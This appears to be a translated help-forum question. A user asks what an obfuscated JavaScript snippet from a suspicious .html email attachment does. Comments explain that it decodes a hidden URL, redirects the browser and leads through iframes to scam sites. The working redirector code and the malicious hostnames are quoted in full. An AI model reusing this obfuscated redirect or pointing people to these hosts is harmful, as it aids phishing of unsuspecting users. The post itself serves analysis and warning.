Einige meiner Nicht-IT-Mitarbeiter haben eine .html-Anlage in einer E-Mail-Nachricht geöffnet, die äußerst verdächtig aussieht. Es führte zu einem leeren Bildschirm, wenn es scheint, dass etwas JavaScript-Code ausgeführt wurde.Was macht dieser verdächtige Phishing-Code?
<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>
Was hat es getan? Das geht über meine Programmierkenntnisse hinaus.
Ich schlage niemandem vor, klicken Sie auf diesen Link. Diese Seite lädt einen iframe von http://onionfleet.ru:8080/index.php?pid=10 und leitet zu http://mouselong.com um. auch ** Klicken Sie nicht auf die Links in diesem Kommentar **, wenn Sie nicht wissen, was Sie tun. – x1a4
welches wiederum einen iFrame enthält, der zu einer Scam-Site verlinkt, die * nicht so authentische * Uhren scheinbar verkauft ... – nico